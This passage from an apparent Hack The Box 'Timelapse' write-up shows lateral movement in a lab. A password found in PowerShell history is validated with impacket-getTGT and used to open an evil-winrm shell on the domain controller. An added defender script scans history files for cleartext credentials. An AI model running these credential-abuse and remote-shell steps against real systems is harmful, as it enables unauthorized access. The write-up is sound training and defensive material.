legacyy
A cleartext credential for the svc_deploy account was disclosed in the PowerShell history file of the legacyy user. While it is unclear whether the svc_deploy account is also a member of the Remote Management Users group, other validation methods can be used.
```
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ impacket-getTGT timelapse.htb/svc_deploy@dc01.timelapse.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra

password: E3R$Q62^12p7PLlC%KWaxuaV
[*] Saving ticket in svc_deploy@dc01.timelapse.htb.ccache
```
Validation is complete: the KDC issued a TGT for the credential, confirming that it is valid. Lateral movement to the svc_deploy account is achieved.
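As an added defender-side example (not part of the original writeup), the following Python hunt flags PowerShell history lines that carry a cleartext credential, which is the disclosure that exposed svc_deploy here. The rule set and the sample history are constructed for this example; the PSReadLine history path is the standard per-user location.

```python
import re
from pathlib import Path

# Rules for history lines that commonly carry a secret in cleartext.
# Constructed for this example; extend them for the tooling used in your environment.
RULES = [
    ("ConvertTo-SecureString",
     re.compile(r"ConvertTo-SecureString(?:\s+-(?:AsPlainText|Force))*\s+(?:-String\s+)?['\"]?(?P<secret>[^'\"\s]+)", re.I)),
    ("password switch",
     re.compile(r"(?:^|\s)(?:-p|-Password|--password|-pw)\s+['\"]?(?P<secret>[^'\"\s]+)", re.I)),
    ("password assignment",
     re.compile(r"(?:password|passwd)\s*=\s*['\"]?(?P<secret>[^'\"\s;]+)", re.I)),
]

def redact(secret: str) -> str:
    """Keep the first character and the length so a finding is reportable without re-disclosing the secret."""
    return secret[:1] + "*" * (len(secret) - 1)

def scan_history(lines):
    """Return (line_no, rule_name, redacted_secret) for each line that looks like it carries a credential."""
    findings = []
    for no, line in enumerate(lines, 1):
        for name, pattern in RULES:
            m = pattern.search(line)
            if m:
                findings.append((no, name, redact(m.group("secret"))))
                break  # one finding per line is enough for triage
    return findings

def scan_user_histories(users_root: Path):
    """Scan every user's PSReadLine history below users_root (normally C:\\Users on a live host
    or a mounted image). Returns {username: findings}."""
    relative = "AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"
    results = {}
    for hist in users_root.glob(f"*/{relative}"):
        findings = scan_history(hist.read_text(errors="replace").splitlines())
        if findings:
            results[hist.relative_to(users_root).parts[0]] = findings
    return results

# Constructed sample history: the kind of lines that disclosed svc_deploy's password in this lab
# (the secrets below are placeholders, not the lab's credential).
SAMPLE_HISTORY = [
    "whoami",
    "Get-ADUser -Filter * | Select-Object Name",
    "$p = ConvertTo-SecureString 'ExamplePassw0rd!' -AsPlainText -Force",
    "$c = New-Object System.Management.Automation.PSCredential ('timelapse\\svc_deploy', $p)",
    "Invoke-Command -ComputerName dc01 -Credential $c -ScriptBlock { whoami }",
    "sqlcmd -S dc01 -U sa -P 'Ex4mpleSqlS3cret!'",
]

if __name__ == "__main__":
    for no, rule, masked in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {rule} -> {masked}")   # line 3 and line 6 are flagged
```

On a Windows host, `scan_user_histories(Path(r"C:\Users"))` walks every profile; the same call works against a mounted disk image by pointing it at that image's Users directory.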
WinRM
As discovered through ldapdomaindump and the BloodHound session, the svc_deploy account is a member of the Remote Management Users group.
```
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ evil-winrm -i dc01.timelapse.htb -S -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> hostname
dc01
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::245
   IPv6 Address. . . . . . . . . . . : dead:beef::cc93:dbe2:8401:964
   Link-local IPv6 Address . . . . . : fe80::cc93:dbe2:8401:964%13
   IPv4 Address. . . . . . . . . . . : 10.10.11.152
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%13
                                       10.10.10.2
```
A PowerShell session over WinRM is established as timelapse\svc_deploy on dc01.